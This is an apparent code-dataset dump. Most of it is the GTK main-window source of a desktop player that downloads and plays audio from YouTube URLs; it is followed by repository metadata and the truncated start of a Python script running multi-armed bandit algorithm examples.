DBusGMainLoop\nfrom mutagen.oggvorbis import OggVorbis\nfrom . import comun\nfrom .comun import _\nfrom .sound_menu import SoundMenuControls\nfrom .player import Player\nfrom .player import Status\nfrom .configurator import Configuration\nfrom .listboxrowwithdata import ListBoxRowWithData\nfrom .fsync import fsync_function\nfrom .utils import from_remote_image_to_base64\nfrom .utils import get_thumbnail_filename_for_audio\nfrom .youtube_utils import resolve_youtube_url\nfrom .youtube_utils import parse_youtube_url\nfrom .youtube_utils import is_youtube_list\nfrom .youtube_utils import getPlaylistVideoUrls\nfrom .downloadermanager import DownloaderManager\nfrom .showinfodialog import ShowInfoDialog\nfrom .preferencesdialog import PreferencesDialog\n\nDEFAULT_CURSOR = Gdk.Cursor(Gdk.CursorType.ARROW)\nWAIT_CURSOR = Gdk.Cursor(Gdk.CursorType.WATCH)\n\nCSS = '''\n#button:hover,\n#button {\n border-image: none;\n background-image: none;\n background-color: rgba(0, 0, 0, 0);\n border-color: rgba(0, 0, 0, 0);\n border-image: none;\n border-radius: 0;\n border-width: 0;\n border-style: solid;\n text-shadow: 0 0 rgba(0, 0, 0, 0);\n box-shadow: 0 0 rgba(0, 0, 0, 0), 0 0 rgba(0, 0, 0, 0);\n}\n#button:hover{\n background-color: rgba(0, 0, 0, 0.1);\n}\n'''\n\n\ndef get_index_audio(audios, display_id):\n for index, audio in enumerate(audios):\n if audio['display_id'] == display_id:\n return index\n return -1\n\n\nclass MainWindow(Gtk.ApplicationWindow):\n __gsignals__ = {\n 'text-changed': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE,\n (object,)),\n 'save-me': (GObject.SIGNAL_RUN_FIRST, GObject.TYPE_NONE,\n (object,)), }\n\n def __init__(self, app, afile=None):\n Gtk.ApplicationWindow.__init__(self, application=app)\n\n self.set_position(Gtk.WindowPosition.CENTER_ALWAYS)\n self.set_icon_from_file(comun.ICON)\n self.set_default_size(600, 600)\n self.connect('destroy', self.on_close)\n\n self.get_root_window().set_cursor(WAIT_CURSOR)\n\n self.active_row = None\n self.updater = None\n self.configuration = Configuration()\n\n max_action = Gio.SimpleAction.new_stateful(\n \"maximize\", None, GLib.Variant.new_boolean(False))\n max_action.connect(\"change-state\", self.on_maximize_toggle)\n self.add_action(max_action)\n\n self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)\n self.notification = Notify.Notification.new('', '', None)\n\n self.player = Player()\n self.player.connect('started', self.on_player_started)\n self.player.connect('paused', self.on_player_paused)\n self.player.connect('stopped', self.on_player_stopped)\n\n DBusGMainLoop(set_as_default=True)\n self.sound_menu = SoundMenuControls('LPLAYER')\n self.sound_menu._sound_menu_is_playing = self._sound_menu_is_playing\n self.sound_menu._sound_menu_play = self._sound_menu_play\n self.sound_menu._sound_menu_pause = self._sound_menu_pause\n self.sound_menu._sound_menu_next = self._sound_menu_next\n self.sound_menu._sound_menu_previous = self._sound_menu_previous\n self.sound_menu._sound_menu_raise = self._sound_menu_raise\n self.sound_menu._sound_menu_stop = self._sound_menu_stop\n\n # Vertical box. Contains menu and PaneView\n vbox = Gtk.VBox(False, 2)\n self.add(vbox)\n #\n\n # Init HeaderBar\n self.init_headerbar()\n\n # Init Menu\n # self.init_menu()\n\n # Init Toolbar\n # self.init_toolbar()\n #\n scrolledwindow = Gtk.ScrolledWindow()\n scrolledwindow.set_policy(Gtk.PolicyType.AUTOMATIC,\n Gtk.PolicyType.AUTOMATIC)\n scrolledwindow.set_shadow_type(Gtk.ShadowType.ETCHED_OUT)\n scrolledwindow.set_visible(True)\n vbox.pack_start(scrolledwindow, True, True, 0)\n\n self.trackview = Gtk.ListBox()\n self.trackview.connect('row-activated', self.on_row_activated)\n self.trackview.connect('row-selected', self.on_row_selected)\n self.trackview.connect('selected-rows-changed',\n self.on_row_selected_changed)\n self.trackview.set_activate_on_single_click(False)\n self.trackview.set_selection_mode(Gtk.SelectionMode.MULTIPLE)\n scrolledwindow.add(self.trackview)\n\n for index, track in enumerate(self.configuration.get('audios')):\n row = ListBoxRowWithData(track, index)\n row.connect('button_play_pause_clicked', self.on_row_play, row)\n row.connect('button_info_clicked', self.on_row_info, row)\n row.connect('button_listened_clicked', self.on_row_listened, row)\n row.connect('button_download_clicked', self.on_row_download, row)\n row.show()\n self.trackview.add(row)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n row = self.trackview.get_row_at_index(0)\n self.trackview.handler_block_by_func(self.on_row_selected)\n self.trackview.select_row(row)\n self.trackview.handler_unblock_by_func(self.on_row_selected)\n\n self.downloaderManager = DownloaderManager()\n\n self.load_css()\n self.show_all()\n self.play_controls.set_visible(True)\n if len(self.trackview.get_children()) > 0:\n self.set_active_row(self.trackview.get_row_at_index(0))\n\n def on_close(self, widget):\n self.configuration.save()\n\n def on_download_all_clicked(self, widget):\n for row in self.trackview.get_children():\n self.on_row_download(None, row)\n\n def on_preferences_clicked(self, widget):\n self.configuration.save()\n cm = PreferencesDialog(self)\n if cm.run() == Gtk.ResponseType.ACCEPT:\n cm.hide()\n cm.save_preferences()\n self.configuration.read()\n cm.destroy()\n\n def on_maximize_toggle(self, action, value):\n action.set_state(value)\n if value.get_boolean():\n self.maximize()\n else:\n self.unmaximize()\n\n def on_row_download_started(self, widget, row):\n row.set_downloading(True)\n\n def on_row_download_ended(self, widget, row):\n row.set_downloading(False)\n filename = os.path.join(comun.AUDIO_DIR,\n '{0}.ogg'.format(row.audio['display_id']))\n if os.path.exists(filename):\n row.set_downloaded(True)\n duration = OggVorbis(filename).info.length\n row.set_duration(duration)\n else:\n row.set_downloaded(False)\n self.set_audio(row.audio)\n self.configuration.save()\n\n def on_row_download_failed(self, widget, row):\n row.set_downloading(False)\n row.set_downloaded(False)\n\n def on_row_download(self, widget, row):\n if row.audio['downloaded'] is True:\n filename = os.path.join(comun.AUDIO_DIR,\n '{0}.ogg'.format(row.audio['display_id']))\n if os.path.exists(filename):\n row.set_downloaded(False)\n else:\n self.downloaderManager.add(row)\n self.downloaderManager.connect('started',\n self.on_row_download_started)\n self.downloaderManager.connect('ended',\n self.on_row_download_ended)\n self.downloaderManager.connect('failed',\n self.on_row_download_failed)\n\n def on_row_listened(self, widget, row):\n listened = not row.audio['listened']\n row.set_listened(listened)\n self.set_audio(row.audio)\n\n def on_row_info(self, widget, row):\n sid = ShowInfoDialog(self,\n row.audio['creator'],\n row.audio['title'],\n row.audio['url'],\n row.audio['description'])\n sid.run()\n sid.hide()\n sid.destroy()\n\n def on_row_play(self, widget, row):\n if self.active_row is not None and self.active_row != row and\\\n self.active_row.is_playing is True:\n self.active_row.set_playing(False)\n self.player.pause()\n self.control['play-pause'].get_child().set_from_gicon(\n Gio.ThemedIcon(name='media-playback-start-symbolic'),\n Gtk.IconSize.BUTTON)\n self.control['play-pause'].set_tooltip_text(_('Play'))\n self.set_active_row(row)\n if self.active_row.is_playing is False:\n filename = os.path.join(comun.AUDIO_DIR,\n '{0}.ogg'.format(row.audio['display_id']))\n\n self.player.set_filename(filename)\n self.player.set_speed(self.configuration.get('speed'))\n self.player.set_remove_silence(\n self.configuration.get('remove_silence'))\n self.player.set_equalizaer(self.configuration.get('equalizer'))\n\n fraction = float(self.active_row.get_position())\n self.control['position'].handler_block_by_func(\n self.on_position_button_changed)\n self.control['position'].set_value(fraction)\n self.control['label-position'].set_text(\n _('Position') + ': {0}%'.format(int(fraction * 100)))\n self.control['position'].handler_unblock_by_func(\n self.on_position_button_changed)\n self.control['play-pause'].get_child().set_from_gicon(\n Gio.ThemedIcon(name='media-playback-pause-symbolic'),\n Gtk.IconSize.BUTTON)\n self.control['play-pause'].set_tooltip_text(_('Pause'))\n if self.active_row.get_position() > 0:\n self.player.set_position(\n self.active_row.audio['position'] *\n float(self.active_row.audio['duration']))\n artists = ['']\n album = self.active_row.audio['title']\n title = self.active_row.audio['title']\n album_art = 'file://' + get_thumbnail_filename_for_audio(\n self.active_row.audio)\n self.sound_menu.song_changed(artists, album, title, album_art)\n self.sound_menu.signal_playing()\n\n self.notification.update('{0} - {1}'.format(\n 'YOAUP',\n album),\n title,\n album_art)\n self.notification.show()\n\n if self.active_row.audio['position'] > 0 and\\\n self.active_row.audio['position'] <= 1:\n self.player.set_position(\n self.active_row.audio['position'] *\n float(self.active_row.audio['duration']))\n self.player.play()\n self.updater = GLib.timeout_add_seconds(1, self.update_position)\n self.active_row.set_playing(True)\n else:\n artists = [self.active_row.audio['creator']]\n album = self.active_row.audio['title']\n title = self.active_row.audio['title']\n album_art = 'file://' + get_thumbnail_filename_for_audio(\n self.active_row.audio)\n self.sound_menu.song_changed(artists, album, title, album_art)\n self.sound_menu.signal_paused()\n\n self.player.pause()\n self.control['play-pause'].get_child().set_from_gicon(\n Gio.ThemedIcon(name='media-playback-start-symbolic'),\n Gtk.IconSize.BUTTON)\n self.control['play-pause'].set_tooltip_text(_('Play'))\n\n self.active_row.set_playing(False)\n audios = self.configuration.get('audios')\n audio_index = get_index_audio(\n audios, self.active_row.audio['display_id'])\n audios[audio_index]['position'] = self.active_row.audio['position']\n self.configuration.set('audios', audios)\n\n def _sound_menu_is_playing(self):\n return self.player.status == Status.PLAYING\n\n def _sound_menu_play(self, *args):\n \"\"\"Play\"\"\"\n # self.is_playing = True # Need to overwrite\n row = self.active_row\n if row is None:\n self.set_active_row(self.trackview.get_row_at_index(0))\n self.active_row.click_button_play()\n\n def _sound_menu_stop(self):\n \"\"\"Pause\"\"\"\n exit(0)\n if self.active_row is not None and self.active_row.is_playing is True:\n self.active_row.click_button_play()\n\n def _sound_menu_pause(self, *args):\n \"\"\"Pause\"\"\"\n if self.active_row is not None:\n self.active_row.click_button_play()\n\n def _sound_menu_next(self, *args):\n \"\"\"Next\"\"\"\n index = self.get_next_playable_track()\n if index is not None:\n row = self.trackview.get_row_at_index(index)\n row.click_button_play()\n\n def _sound_menu_previous(self, *args):\n \"\"\"Previous\"\"\"\n index = self.get_previous_playable_track()\n if index is not None:\n row = self.trackview.get_row_at_index(index)\n row.click_button_play()\n\n def _sound_menu_raise(self):\n \"\"\"Click on player\"\"\"\n self.show()\n\n def on_row_selected(self, widget, row):\n pass\n\n def get_playable_tracks(self):\n playables = []\n for index in range(0, len(self.trackview.get_children())):\n if self.trackview.get_row_at_index(index).can_play():\n playables.append(index)\n return sorted(playables)\n\n def get_next_playable_track(self):\n playables = self.get_playable_tracks()\n if len(playables) > 0:\n if self.active_row is not None and\\\n self.active_row.index in playables:\n selected = playables.index(self.active_row.index)\n next = selected + 1\n if next >= len(playables):\n next = 0\n return playables[next]\n else:\n return playables[0]\n return None\n\n def get_previous_playable_track(self):\n playables = self.get_playable_tracks()\n if len(playables) > 0:\n if self.active_row is not None and\\\n self.active_row.index in playables:\n selected = playables.index(self.active_row.index)\n previous = selected - 1\n if previous < 0:\n previous = len(playables) - 1\n return playables[previous]\n else:\n return playables[0]\n return None\n\n def set_audio(self, audio):\n audios = self.configuration.get('audios')\n for index, audio in enumerate(audios):\n if audio['display_id'] == audio['display_id']:\n audios[index] = audio\n self.configuration.set('audios', audios)\n break\n\n def update_position(self):\n if self.active_row is not None:\n position = self.player.get_position() / float(\n self.active_row.audio['duration'])\n if position >= 0:\n self.active_row.set_position(position)\n self.set_audio(self.active_row.audio)\n\n self.control['position'].handler_block_by_func(\n self.on_position_button_changed)\n self.control['position'].set_value(int(position * 100))\n self.control['label-position'].set_text(\n _('Position') + ': {0}%'.format(int(position * 100)))\n self.control['position'].handler_unblock_by_func(\n self.on_position_button_changed)\n if position >= 0.99:\n self.active_row.set_listened(True)\n self.active_row.set_position(0)\n if self.configuration.get('remove_on_listened') is True:\n self.active_row.set_downloaded(False)\n self.set_audio(self.active_row.audio)\n if self.active_row.is_playing is True:\n self.active_row.set_playing(False)\n self.player.pause()\n self._sound_menu_next()\n return self.player.status == Status.PLAYING\n\n def on_player_started(self, player, position):\n pass\n\n def on_player_paused(self, player, position):\n pass\n\n def on_player_stopped(self, player, position):\n pass\n\n def on_row_selected_changed(self, widget):\n\n pass\n\n def on_row_activated(self, widget, row):\n self.set_active_row(row)\n\n def on_downloader_failed(self, widget, row, filename):\n if os.path.exists(filename):\n os.remove(filename)\n row.set_downloading(False)\n row.set_downloaded(False)\n\n self.control['play-pause'].set_sensitive(False)\n self.control['speed'].set_sensitive(False)\n self.control['position'].set_sensitive(False)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n def on_downloader_ended(self, widget, row, filename):\n if os.path.exists(filename):\n filename = filename.split('/')[-1]\n\n # self.db.set_track_downloaded(row.data['id'], filename)\n # self.configuration.get('audios')\n row.set_downloading(False)\n row.set_downloaded(True)\n\n self.control['play-pause'].set_sensitive(True)\n self.control['speed'].set_sensitive(True)\n self.control['position'].set_sensitive(True)\n\n self.set_audio(row.audio)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n def on_play_continuously_changed(self, widget, value):\n self.configuration.set('play_continuously', widget.get_active())\n\n def on_remove_silence_changed(self, widget, value):\n self.player.set_remove_silence(widget.get_active())\n self.configuration.set('remove_silence', widget.get_active())\n\n def on_speed_button_changed(self, widget):\n value = widget.get_value()\n self.control['label-speed'].set_text(\n _('Speed') + ': {0}x'.format(int(value * 10) / 10))\n self.player.set_speed(value)\n self.configuration.set('speed', value)\n\n def on_position_button_changed(self, widget):\n value = widget.get_value()\n\n self.control['label-position'].set_label(\n _('Position' + ': {0}%'.format(int(value))))\n if self.active_row is not None:\n value = float(value) / 100.0\n if value >= 0.0 and value <= 1.0:\n self.active_row.set_position(value)\n self.set_audio(self.active_row.audio)\n self.player.set_position(\n value * float(self.active_row.audio['duration']))\n\n def init_headerbar(self):\n self.control = {}\n self.menu_selected = 'suscriptions'\n #\n hb = Gtk.HeaderBar()\n hb.set_show_close_button(True)\n hb.props.title = comun.APPNAME\n self.set_titlebar(hb)\n\n self.play_controls = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 5)\n hb.pack_start(self.play_controls)\n\n popover = Gtk.Popover()\n popover_grid = Gtk.Grid()\n popover_grid.set_margin_top(10)\n popover_grid.set_margin_bottom(10)\n popover_grid.set_margin_left(10)\n popover_grid.set_margin_right(10)\n popover_grid.set_column_spacing(5)\n popover_grid.set_row_spacing(5)\n popover.add(popover_grid)\n\n self.control['label-position'] = Gtk.Label(_('Position') + ':')\n self.control['label-position'].set_alignment(0, 0.5)\n popover_grid.attach(self.control['label-position'], 0, 0, 5, 1)\n self.control['position'] = Gtk.Scale()\n self.control['position'].set_tooltip_text(\n _('Relative position'))\n self.control['position'].set_adjustment(\n Gtk.Adjustment(0, 0, 100, 1, 1, 5))\n self.control['position'].connect('value-changed',\n self.on_position_button_changed)\n self.control['position'].set_value(0)\n popover_grid.attach(self.control['position'], 5, 0, 5, 1)\n\n self.control['label-speed'] = Gtk.Label(_('Speed') + ':')\n self.control['label-speed'].set_alignment(0, 0.5)\n popover_grid.attach(self.control['label-speed'], 0, 1, 5, 1)\n self.control['speed'] = Gtk.Scale()\n self.control['speed'].set_adjustment(Gtk.Adjustment(\n 1, 0.5, 4, 0.1, 0.1, 1))\n self.control['speed'].set_size_request(200, 0)\n self.control['speed'].connect('value-changed',\n self.on_speed_button_changed)\n self.control['speed'].set_value(self.configuration.get('speed'))\n popover_grid.attach(self.control['speed'], 5, 1, 5, 1)\n\n label = Gtk.Label(_('Remove silence') + ':')\n label.set_alignment(0, 0.5)\n popover_grid.attach(label, 0, 2, 5, 1)\n\n self.control['remove-silence'] = Gtk.Switch()\n self.control['remove-silence'].set_active(\n self.configuration.get('remove_silence'))\n self.control['remove-silence'].connect(\n 'notify::active', self.on_remove_silence_changed)\n tbox = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 0)\n tbox.add(self.control['remove-silence'])\n popover_grid.attach(tbox, 5, 2, 5, 1)\n\n label = Gtk.Label(_('Play continuously') + ':')\n label.set_alignment(0, 0.5)\n popover_grid.attach(label, 0, 3, 5, 1)\n\n self.control['play_continuously'] = Gtk.Switch()\n self.control['play_continuously'].set_active(\n self.configuration.get('play_continuously'))\n self.control['play_continuously'].connect(\n 'notify::active', self.on_play_continuously_changed)\n tbox = Gtk.Box.new(Gtk.Orientation.HORIZONTAL, 0)\n tbox.add(self.control['play_continuously'])\n popover_grid.attach(tbox, 5, 3, 5, 1)\n\n popover_grid.attach(Gtk.Label(_('Equalizer')), 0, 4, 10, 1)\n\n for index in range(0, 10):\n band = 'band{0}'.format(index)\n self.control[band] = Gtk.Scale.new_with_range(\n Gtk.Orientation.VERTICAL, -24.0, 12.0, 0.1)\n self.control[band].set_size_request(0, 200)\n self.control[band].set_value(\n self.configuration.get('equalizer')[band])\n self.control[band].connect('value-changed',\n self.on_band_changed, band)\n popover_grid.attach(self.control[band], index, 5, 1, 1)\n\n popover_grid.show_all()\n\n self.control['configuration'] = Gtk.MenuButton()\n self.control['configuration'].set_tooltip_text(_('Configuration'))\n self.control['configuration'].add(\n Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='preferences-system-symbolic'), Gtk.IconSize.BUTTON))\n self.control['configuration'].set_popover(popover)\n self.play_controls.pack_start(self.control['configuration'],\n False, False, 0)\n\n self.control['previous'] = Gtk.Button()\n self.control['previous'].set_tooltip_text(_('Previous'))\n self.control['previous'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='go-next-symbolic-rtl'), Gtk.IconSize.BUTTON))\n self.control['previous'].connect('clicked',\n self._sound_menu_previous)\n self.play_controls.pack_start(self.control['previous'],\n False, False, 0)\n\n self.control['play-pause'] = Gtk.Button()\n self.control['play-pause'].set_tooltip_text(_('Play'))\n self.control['play-pause'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='media-playback-start-symbolic'), Gtk.IconSize.BUTTON))\n self.control['play-pause'].connect('clicked',\n self._sound_menu_play)\n self.play_controls.pack_start(self.control['play-pause'],\n False, False, 0)\n\n self.control['next'] = Gtk.Button()\n self.control['next'].set_tooltip_text(_('Next'))\n self.control['next'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='go-next-symbolic'), Gtk.IconSize.BUTTON))\n self.control['next'].connect('clicked',\n self._sound_menu_next)\n self.play_controls.pack_start(self.control['next'], False, False, 0)\n\n help_model = Gio.Menu()\n\n help_section0_model = Gio.Menu()\n help_section0_model.append(_('Download all'), 'app.download_all')\n help_section0_model.append(_('Preferences'), 'app.set_preferences')\n help_section0 = Gio.MenuItem.new_section(None, help_section0_model)\n help_model.append_item(help_section0)\n\n help_section1_model = Gio.Menu()\n help_section1_model.append(_('Homepage'), 'app.goto_homepage')\n help_section1 = Gio.MenuItem.new_section(None, help_section1_model)\n help_model.append_item(help_section1)\n\n help_section2_model = Gio.Menu()\n help_section2_model.append(_('Code'), 'app.goto_code')\n help_section2_model.append(_('Issues'), 'app.goto_bug')\n help_section2 = Gio.MenuItem.new_section(None, help_section2_model)\n help_model.append_item(help_section2)\n\n help_section3_model = Gio.Menu()\n help_section3_model.append(_('Twitter'), 'app.goto_twitter')\n help_section3_model.append(_('Facebook'), 'app.goto_facebook')\n help_section3_model.append(_('Google+'), 'app.goto_google_plus')\n help_section3 = Gio.MenuItem.new_section(None, help_section3_model)\n help_model.append_item(help_section3)\n\n help_section4_model = Gio.Menu()\n help_section4_model.append(_('Donations'), 'app.goto_donate')\n help_section4 = Gio.MenuItem.new_section(None, help_section4_model)\n help_model.append_item(help_section4)\n\n help_section5_model = Gio.Menu()\n help_section5_model.append(_('About'), 'app.about')\n help_section5 = Gio.MenuItem.new_section(None, help_section5_model)\n help_model.append_item(help_section5)\n\n self.control['help'] = Gtk.MenuButton()\n self.control['help'].set_menu_model(help_model)\n self.control['help'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='open-menu-symbolic'), Gtk.IconSize.BUTTON))\n hb.pack_end(self.control['help'])\n\n self.control['remove'] = Gtk.Button()\n self.control['remove'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='list-remove-symbolic'), Gtk.IconSize.BUTTON))\n self.control['remove'].connect('clicked', self.on_remove_track)\n hb.pack_end(self.control['remove'])\n\n self.popover_add = Gtk.Popover()\n popover_add_grid = Gtk.Grid()\n self.popover_add.add(popover_add_grid)\n popover_add_grid.attach(Gtk.Label(_('YouTube url') + ':'),\n 0, 0, 1, 1)\n self.control['add_entry'] = Gtk.SearchEntry()\n self.control['add_entry'].connect('activate',\n self.on_add_entry_clicked)\n popover_add_grid.attach(self.control['add_entry'], 1, 0, 1, 1)\n popover_add_grid.show_all()\n # popover_add.show_all()\n\n self.control['add'] = Gtk.MenuButton()\n self.control['add'].add(Gtk.Image.new_from_gicon(Gio.ThemedIcon(\n name='list-add-symbolic'), Gtk.IconSize.BUTTON))\n self.control['add'].set_popover(self.popover_add)\n hb.pack_end(self.control['add'])\n\n def on_band_changed(self, widget, band):\n equalizer = self.configuration.get('equalizer')\n equalizer[band] = widget.get_value()\n self.configuration.set('equalizer', equalizer)\n self.player.set_equalizer_by_band(int(band[4:]), widget.get_value())\n print(widget, band, int(band[4:]))\n\n def on_add_entry_clicked(self, widget):\n text = widget.get_text()\n self.add_track(text)\n widget.get_buffer().delete_text(0, -1)\n self.popover_add.hide()\n\n def on_remove_track(self, widget):\n if self.active_row is not None:\n if len(self.trackview.get_selected_rows()) > 1:\n msg = _('Are you sure to delete the tracks')\n else:\n msg = _('Are you sure to delete the track')\n dialog = Gtk.MessageDialog(\n self,\n 0,\n Gtk.MessageType.WARNING,\n Gtk.ButtonsType.OK_CANCEL,\n msg)\n if dialog.run() == Gtk.ResponseType.OK:\n dialog.destroy()\n audios = self.configuration.get('audios')\n for row in self.trackview.get_selected_rows():\n audios.remove(row.audio)\n self.configuration.set('audios', audios)\n self.trackview.remove(row)\n extension = row.audio['ext']\n audio_id = row.audio['display_id']\n filein = os.path.join(\n comun.AUDIO_DIR,\n '{0}.{1}'.format(audio_id, extension))\n fileout = os.path.join(\n comun.AUDIO_DIR,\n '{0}.{1}'.format(audio_id, 'ogg'))\n if os.path.exists(filein):\n os.remove(filein)\n if os.path.exists(fileout):\n os.remove(fileout)\n self.trackview.show_all()\n if self.active_row.audio == row.audio and\\\n len(self.trackview.get_children()) > 0:\n self.set_active_row(self.trackview.get_row_at_index(0))\n else:\n self.set_active_row()\n else:\n dialog.destroy()\n\n def set_active_row(self, row=None):\n self.trackview.unselect_all()\n self.active_row = row\n if row is not None:\n self.trackview.select_row(row)\n\n def add_track(self, text):\n\n def on_add_track_in_thread_done(result, error):\n if error is None and result is not None:\n audios = self.configuration.get('audios')\n for audio in audios:\n if audio == result:\n return\n audios.append(result)\n self.configuration.set('audios', audios)\n row = ListBoxRowWithData(result, len(audios) - 1)\n row.connect('button_play_pause_clicked',\n self.on_row_play,\n row)\n row.connect('button_info_clicked', self.on_row_info, row)\n row.connect('button_listened_clicked',\n self.on_row_listened,\n row)\n row.connect('button_download_clicked',\n self.on_row_download,\n row)\n row.show()\n self.trackview.add(row)\n self.trackview.show_all()\n\n self.configuration.set('audios', audios)\n self.configuration.save()\n if self.configuration.get('download_on_added') is True:\n self.on_row_download(None, row)\n\n self.get_root_window().set_cursor(DEFAULT_CURSOR)\n\n @fsync_function(on_done=on_add_track_in_thread_done)\n def do_add_track_in_thread(url):\n result = resolve_youtube_url(url)\n if result is not None:\n for audio in self.configuration.get('audios'):\n if result == audio:\n return None\n if result['thumbnail'] is not None:\n thumbnail_base64 = from_remote_image_to_base64(\n result['thumbnail'])\n if thumbnail_base64 is not None:\n result['thumbnail_base64'] = thumbnail_base64\n return result\n\n if is_youtube_list(text) is True:\n for url in getPlaylistVideoUrls(text):\n self.get_root_window().set_cursor(WAIT_CURSOR)\n do_add_track_in_thread(url)\n else:\n url = parse_youtube_url(text)\n if url is not None:\n self.get_root_window().set_cursor(WAIT_CURSOR)\n do_add_track_in_thread(url)\n\n def on_toggled(self, widget, arg):\n if widget.get_active() is True:\n if arg == self.menu_selected:\n if self.menu[arg].get_active() is False:\n self.menu[arg].set_active(True)\n else:\n old = self.menu_selected\n self.menu_selected = arg\n self.menu[old].set_active(False)\n else:\n if self.menu_selected == arg:\n widget.set_active(True)\n\n def load_css(self):\n style_provider = Gtk.CssProvider()\n style_provider.load_from_data(CSS.encode())\n Gtk.StyleContext.add_provider_for_screen(\n Gdk.Screen.get_default(),\n style_provider,\n Gtk.STYLE_PROVIDER_PRIORITY_USER)\n","repo_name":"atareao/yoaup","sub_path":"src/yoaup/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":33809,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"8463442574","text":"\"\"\"Simple script to run snips of code\"\"\"\n# Standard Libraries\nimport os\nimport sys\nos.chdir(os.path.dirname(__file__))\n\n# Third party libraries\nfrom icecream import ic\n\n# Local imports\nfrom algorl.logs import logging\nfrom algorl.src.bandit import *\n\nlogger = logging.getLogger(__name__)\n\nfrom abc import ABC, abstractmethod\nclass MABExamples(ABC):\n '''Operations'''\n @abstractmethod\n def mab():\n pass\n\nclass OnlyExploitationRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n best_action_percentages = []\n for num in range(150):\n print(num)\n oe = OnlyExploitation(bandits)\n tot_return, best_action_percentage = oe.simulate(time = times)\n # bandits.plot_true_mean_vs_estimation(pic_name)\n # regret = oe.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return)\n best_action_percentages.append(best_action_percentage)\n # print(best_action_percentage)\n print(np.mean([best_action_percentages], axis=1)[0])\n# \"\"\"\nclass GreedySampleAverages(MABExamples):\n ''' Test the greedy algorithm with sample_averages '''\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n greedy = Greedy(bandits)\n tot_return, best_action_percentage = greedy.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n regret = greedy.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return)\n ic(regret)\n # print((greedy.bandits.bandit_df.loc['action_count', :]*greedy.bandits.bandit_df.loc['q_estimation', :]).sum())\n\n\nclass GreedyStepSize(MABExamples):\n ''' Test the greedy algorithm with step_size '''\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n greedy = Greedy(bandits, sample_averages=False, step_size=0.1)\n tot_return, best_action_percentage = greedy.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((greedy.bandits.bandit_df.loc['action_count', :]*greedy.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(greedy.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass GreedySampleAveragesWithInitials(MABExamples):\n '''\n Test the greedy algorithm with optimistic initial values\n '''\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n greedy = Greedy(bandits, sample_averages=True, initial_values=10)\n tot_return, best_action_percentage = greedy.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((greedy.bandits.bandit_df.loc['action_count', :]*greedy.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(greedy.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass UCBRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n ucb = UCB(bandits)\n tot_return, best_action_percentage = ucb.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((ucb.bandits.bandit_df.loc['action_count', :]*ucb.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(ucb.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass GaussianThompsonSamplingRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n gts = GaussianThompsonSampling(bandits=bandits)\n tot_return, best_action_percentage = gts.simulate(time=times) \n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((gts.bandits.bandit_df.loc['action_count', :]*gts.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(gts.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n\n\nclass GBARun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n gba = GBA(bandits)\n tot_return, best_action_percentage = gba.simulate(time = times)\n bandits.plot_true_mean_vs_estimation(pic_name)\n # print((gba.bandits.bandit_df.loc['action_count', :]*gba.bandits.bandit_df.loc['q_estimation', :]).sum())\n ic(gba.bandits.bandit_df.loc['target', :].max()*times - np.sum(tot_return))\n# \"\"\"\n\"\"\"\nclass BernoulliThompsonSamplingRun(MABExamples):\n def __init__(self):\n super().__init__()\n\n def mab(self, bandits, pic_name, times):\n bernoulli_bandits = BernoulliBandits(number_of_arms = 5, q_mean=[0.1, 0.2, 0.5, 0.05, 0.15])\n # BernTS\n ts = BernoulliThompsonSampling(bandits=bernoulli_bandits, bandit_type = \"BernTS\")\n BernTS_return, BernTS_actions = ts.simulate(time=times)\n bernoulli_bandits.plot_true_mean_vs_estimation(pic_name=pic_name, y_axis = 'theta_hat')\n\n # BernGreedy\n ts = BernoulliThompsonSampling(bandits=bernoulli_bandits, bandit_type = \"BernGreedy\")\n BernGreedy_return, BernGreedy_actions = ts.simulate(time=times)\n\n CompareAllBanditsAlgos(time_steps=times).plot_returns(pd.DataFrame({\n 'BernTS':np.cumsum(BernTS_return), 'BernGreedy':np.cumsum(BernGreedy_return)}) )\n CompareAllBanditsAlgos(time_steps=times).plot_action_taken(pd.DataFrame({ \n 'BernTS':BernTS_actions, 'BernGreedy':BernGreedy_actions}))\n# \"\"\"\n\ndef main(arms=5, number_of_trials=5, time_steps=None, q_mean=None, q_sd=None, initial=0, images_dir='images'):\n 